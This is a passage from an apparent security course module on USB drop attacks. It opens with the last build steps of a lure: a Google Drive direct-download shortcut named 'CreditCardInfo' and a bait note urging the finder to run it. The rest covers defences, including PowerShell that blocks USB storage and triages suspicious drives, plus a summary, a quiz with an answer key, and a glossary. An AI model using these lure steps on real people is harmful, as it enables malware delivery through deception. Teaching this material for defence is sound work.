“uc?export=download&” in its place. For example, change
https://drive.google.com/open?id=RandomText to
https://drive.google.com/uc?export=download&id=RandomText
10. Paste the new downloadable link into the address bar of the browser of your choice. Once there, click
the icon to the left of the web address and drag it to the flash drive.
11. Rename the file to “CreditCardInfo”
12. Create a text file named “HowToDisplayCCInfo.txt”. Enter the following text into the text
file:
“Note to self:
To view credit card information click on the CreditCardInfo file, wait for the file to
download, then run the file to see the credit card info. Remember to keep it secret from
others!”
13. Once both files are on the flash drive the attack is ready to deploy.

How to Defend Against USB Drop Attacks


Unfortunately, these sorts of attacks are difficult to defend against, but there are a few things that
can be done to protect yourself. The best thing that you can do to protect yourself is to not plug
in strange USB devices. It may be tempting to see what’s inside because you’re curious, but
don’t. It is not worth the risk of getting a keylogger installed, having valuable
information stolen, getting malware, having your computer destroyed, or other damage. Attackers put
a lot of thought and effort into these attacks and may be more sophisticated than you can
imagine. Some organizations have policies that do not allow USB devices. They may enforce them
by physically disabling USB ports on company-issued devices or by placing items in the USB
ports to prevent devices from being inserted. However, many devices used to block ports can be
easily removed.
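Physical port blockers can be pulled out, so organizations often pair them with a software control. As an added example (not part of the course), the following PowerShell checks, and optionally applies, the two Windows registry settings that block USB mass-storage devices; it must run as Administrator. It does nothing against HID spoofing devices such as the Rubber Ducky, which enumerate as keyboards rather than storage.

```powershell
# Added example: report and optionally enforce the Windows settings that block
# USB mass storage. Run as Administrator. HID-spoofing devices (keyboards) are
# not affected by either setting, so this is only one layer of defense.

# Group Policy "Removable Disks: Deny read/write/execute access" is stored under
# the Removable Disks device class GUID.
$PolicyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\RemovableStorageDevices\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
$UsbstorPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\USBSTOR'

function Get-RemovableStorageStatus {
    # USBSTOR Start type: 3 = load on demand (enabled), 4 = disabled
    $usbstor = Get-ItemProperty -Path $UsbstorPath -Name Start
    $policy  = if (Test-Path $PolicyPath) { Get-ItemProperty -Path $PolicyPath } else { $null }
    [pscustomobject]@{
        UsbstorDisabled = ($usbstor.Start -eq 4)
        DenyRead        = [bool]($policy.Deny_Read    -eq 1)
        DenyWrite       = [bool]($policy.Deny_Write   -eq 1)
        DenyExecute     = [bool]($policy.Deny_Execute -eq 1)
    }
}

function Set-RemovableStorageBlocked {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess('USBSTOR', 'Disable USB mass-storage driver (Start=4)')) {
        Set-ItemProperty -Path $UsbstorPath -Name Start -Value 4 -Type DWord
    }
    if ($PSCmdlet.ShouldProcess('Removable Disks policy', 'Deny read/write/execute')) {
        if (-not (Test-Path $PolicyPath)) { New-Item -Path $PolicyPath -Force | Out-Null }
        foreach ($name in 'Deny_Read', 'Deny_Write', 'Deny_Execute') {
            Set-ItemProperty -Path $PolicyPath -Name $name -Value 1 -Type DWord
        }
    }
}

# Audit only by default; call Set-RemovableStorageBlocked (or add -WhatIf) to enforce.
Get-RemovableStorageStatus | Format-List
```

The USBSTOR change takes effect for devices plugged in after the change; the policy values are the same ones Group Policy writes, so a domain GPO will overwrite them on the next refresh.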

Analyzing Devices
If you have experience in malware analysis, you could plug the device into a machine that has no
network access and no personal information on it and that is used solely for analyzing malware. In the event the
USB is a USB Kill, it may be a good idea to use a machine you don’t mind getting destroyed.
If you choose to do this, you must be very careful not to let any information on the USB device
reach other machines, and not to let the machine you are examining the USB device on become
connected to the local network (LAN) or internet (WAN). The USB devices may carry attacks
that report back, fingerprint your network, or spread to other machines. If you have a machine
that you can examine USB devices on, it can be fun to explore devices used in attacks.
However, be sure to follow the advice above and wipe the machine after you have examined the
device. If you don’t know what you are doing, it may not be a good idea to try this. Another
option is to get the device to a cyber security professional who knows what they are doing.
Giving a device to a family member who is “good with computers” may not be ideal because
they may not know what they are doing and could fall for the attack.
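On such an isolated analysis machine, the first step is to look at the drive without opening anything on it. The following PowerShell triage script is an added example (not the course’s code) that surfaces the disguises covered earlier: files with the Hidden attribute, .lnk shortcuts whose real target is a script, and .url internet shortcuts that would fetch a remote file. The drive letter E:\ is an assumption.

```powershell
# Added example: read-only triage of a mounted removable drive on an isolated
# analysis machine. Nothing on the drive is executed; shortcuts are only parsed.
param([string]$Root = 'E:\')   # assumed drive letter of the mounted device

$ScriptExt = '.bat', '.cmd', '.ps1', '.vbs', '.js', '.exe', '.scr', '.hta'
$Shell = New-Object -ComObject WScript.Shell   # resolves .lnk targets without launching them

function Test-ScriptPath([string]$Path) {
    $ScriptExt -contains [IO.Path]::GetExtension($Path).ToLower()
}

# -Force includes files whose Hidden attribute was set, like the .bat behind the shortcut
Get-ChildItem -Path $Root -Recurse -Force -File | ForEach-Object {
    $file  = $_
    $flags = @()
    if (($file.Attributes -band [IO.FileAttributes]::Hidden) -ne 0) { $flags += 'HIDDEN' }
    if (Test-ScriptPath $file.FullName) { $flags += 'SCRIPT' }

    $target = ''
    switch ($file.Extension.ToLower()) {
        '.lnk' {
            # The icon can be anything; the stored target and arguments cannot hide what runs
            $lnk    = $Shell.CreateShortcut($file.FullName)
            $target = ($lnk.TargetPath + ' ' + $lnk.Arguments).Trim()
            if (Test-ScriptPath $lnk.TargetPath) { $flags += 'LNK->SCRIPT' }
        }
        '.url' {
            # Internet shortcuts are INI text; the URL= line is what the victim would fetch
            $m = Select-String -Path $file.FullName -Pattern '^URL=(.+)$' | Select-Object -First 1
            if ($m) { $target = $m.Matches[0].Groups[1].Value; $flags += 'URL' }
            if ($target -match 'export=download') { $flags += 'DIRECT-DOWNLOAD' }
        }
    }
    [pscustomobject]@{ Name = $file.Name; Flags = ($flags -join ','); Target = $target }
} | Where-Object { $_.Flags } | Format-Table -AutoSize
```

Run against the lab drives built above, the output lists the hidden .bat behind the “2017 Tax Return” shortcut and the direct-download Google Drive link behind the “CreditCardInfo” internet shortcut.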

Red Team Deployments


Some organizations may decide to conduct their own USB drop attacks for the purpose of
educating employees. Typically in these deployments, harmless code is used that reports back
to the security team once someone uses the device. This is a great way to educate employees
about the dangers of strange USB devices and to get them to stay vigilant and report potential
attacks. In my experience, employees can be lectured all day about the dangers, but many
will never listen or take the advice. It is often not until someone personally experiences an attack that
they change their behavior. If your organization has the means to conduct red team attacks
like this, I highly encourage it. It not only makes your employees more educated and vigilant, but
it can also be a valuable experience for everyone involved.

Summary
● What is a USB Drop Attack
○ What the attacks are
○ Social Engineering
○ Popular attack used by Nation-States and “script kiddies”
○ Stuxnet
● Why these attacks are effective
○ Leverages human curiosity
○ Machines don’t check
● Types of USB drop attacks
○ USB Human Interface Drive (HID) Spoofing
■ Acts as a keyboard
■ Only works with certain types of devices
■ Has its own scripting language, DuckyScript
■ Versatile attack that works across platforms
■ Must be completed quickly to be effective
○ Malicious Files/Code
■ Uses everyday flash drives
■ Possibilities are endless
■ Can run entirely hidden if done correctly
■ Can be caught by antivirus
○ Social Engineering Links
■ Uses malicious html/htm links
■ Can be phishing sites to harvest credentials, extort, and/or download
malware
■ Used most on everyday flash drive but can also use HID spoofing devices
■ Must be connected to the internet
○ USB Kill
■ Destroys machines with power surge
■ Most machines aren’t protected
■ Comes with adapters and versions without logo
○ Zero Day
■ Stuxnet
■ Zero Day Driver
■ Disagreement
● Disguising attacks
○ Steganography
○ Link file to hidden file in Windows OS
○ False extension in MacOS and Linux
○ Obfuscating commands to avoid antivirus detection
● Reconnaissance and Deployment
○ What to look for during Recon
■ Researching the victim(s)
■ Researching the target machine(s)
■ Where to leave device
○ Deploying the Device(s)
■ Blending in
■ Making Devices more tempting
● Building the Attacks
○ USB Human Interface Drive (HID) Spoofing
■ DuckyScript
■ Example Windows 10 attack
○ Malicious Files/Code
■ Example Windows 10 attack
○ Social Engineering Links
■ Example Windows 10 attack
● How to defend against USB Drop Attacks
○ Don’t plug it in
○ Block USB ports
○ Disable USB ports
○ Analyzing Devices
■ Use no connection to LAN or WAN and no personal info
■ Wipe it after
○ Red Team Deployments
■ Educating employees

Quiz
1. Which of the following is NOT a type of USB Drop Attack?
a. Malicious File/Code
b. Human Interface Drive Spoofing
c. Steganography
d. USB Kill
2. What is the name of the computer malware that targeted and destroyed an Iranian
nuclear plant’s centrifuges?
a. Stuffnecks
b. WannaCry
c. Stuxnet
d. ILOVEYOU
3. What is the name of the scripting language used in the Human Interface Drive Spoofing
devices?
a. QuackyScript
b. GooseyScript
c. ChickenScript
d. DuckyScript
4. Which method is NOT a way of disguising a malicious file/code attack?
a. Using plain text commands
b. Steganography
c. Adding a link file to a hidden file
d. Adding a false extension name
5. Which of the following should be done when performing reconnaissance for a USB drop
attack?
a. Researching the target victim(s)
b. Researching the target machine(s)
c. Researching the drop sites
d. All of the above
6. Which of the following is a way to protect yourself from a USB drop attack?
a. Plug in the device into your personal machine without internet connection to
examine it
b. Plug in the device into a friend’s machine without internet connection to examine
it
c. Don’t plug in any unknown USB devices
d. Don’t plug in any unknown USB devices unless it’s a manufacturer you recognize
7. Why are USB Drop Attacks so effective?
a. Human curiosity
b. Lack of machine security against unknown USB devices
c. Both A and B
d. None of the above
8. Which of the following is a purpose of a red team deployment of a USB Drop Attack?
a. To keep employees vigilant of attacks
b. To educate employees on how these attacks work
c. To improve compliance of no USB device policies
d. All of the above

Answer Key: 1.C 2.C 3.D 4.A 5.D 6.C 7.C 8.D

Terms
Batch File​: Script file used in Windows operating systems to carry out command-line interpreter
commands
Human Interface Device (HID)​: Devices that attach to computers via the USB port, or similar
ports, that allow humans to input data or allow machines to provide output to humans
Keystroke​: Press or stroke of a key on a keyboard or other device
Local Area Network (LAN)​: Group of machines that share a common line of communication
within a limited area
Macro​: A script within a program that automates tasks
Malware​: Any software that is intended to cause damage to machines or networks
Microcontroller​: A small computer contained on a single integrated circuit.
Nation-State Hacker Group​: Group of hackers that is supported by nation-states that are usually
highly trained and skilled
Obfuscation​: The creation of machine code that is difficult for humans to understand and can
also be used to circumvent malware detection.
Phishing​: Attempt to steal sensitive information by posing as a trustworthy source
Reconnaissance or Recon​: To obtain information about a victim or target by exploring physically
or virtually
Red Team​: Groups that play the role of an adversary but are in reality a part of the security
team. They attempt to exploit weaknesses in networks, machines, buildings, humans, etc.
Root​: The first top-most directory on a storage device
Security Operations Center (SOC)​: Room or building that contains the cyber security team
responsible for analyzing and monitoring for cyber attacks.
Supervisory Control and Data Acquisition (SCADA):​ Computer system that controls and
monitors systems used in facilities like nuclear plants, oil and gas refineries, wastewater
facilities, etc. These systems are typically disconnected from the internet.
Script Kiddie​: An unskilled person who uses existing code/attacks made by others to attack
machines, networks, and/or websites.
Social Engineering​: Using deceptive means to manipulate individuals into divulging information
or performing some action.
Steganography​: The practice of hiding a file inside another file.
Wide Area Network (WAN)​: Interconnected network that extends over a large geographic area.
For example, the internet.
Wiping​: To delete all the data from a storage device.
Worm​: A type of malware that is self-replicating
Zero-Day​: An unknown exploit, except to an attacker, that takes advantage of a vulnerability in
software or hardware that has no patch available.
